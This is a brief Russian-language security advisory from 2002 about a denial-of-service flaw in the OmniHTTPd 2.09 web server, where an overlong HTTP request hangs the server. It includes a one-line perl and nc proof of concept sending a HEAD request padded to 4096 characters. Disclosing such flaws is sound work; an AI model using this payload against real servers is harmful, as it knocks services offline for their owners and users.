Security Lab

DoS проитив OmniHTTPd

Дата публикации:02.07.2002
Дата изменения:17.10.2006
Всего просмотров:979
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: OmniHTTPd - универсальный Web сервер для Windows 9x и NT. При попытке обработать длинный HTTP запрос (более 4096 символов), сервер перестанет отвечать на дальнейшие запросы и зависнет.

Пример:

perl -e 'print "HEAD / "."a"x4096 ."\n\n"' | nc 127.0.0.1 80

Эта атака срабатывает и с другими типами запросов – ‘get’, ‘post’ и т.п.

Уязвимость обнаружена в OmniHTTPd v2.09

Ссылки: BufferOverflow in OmniHTTPd 2.09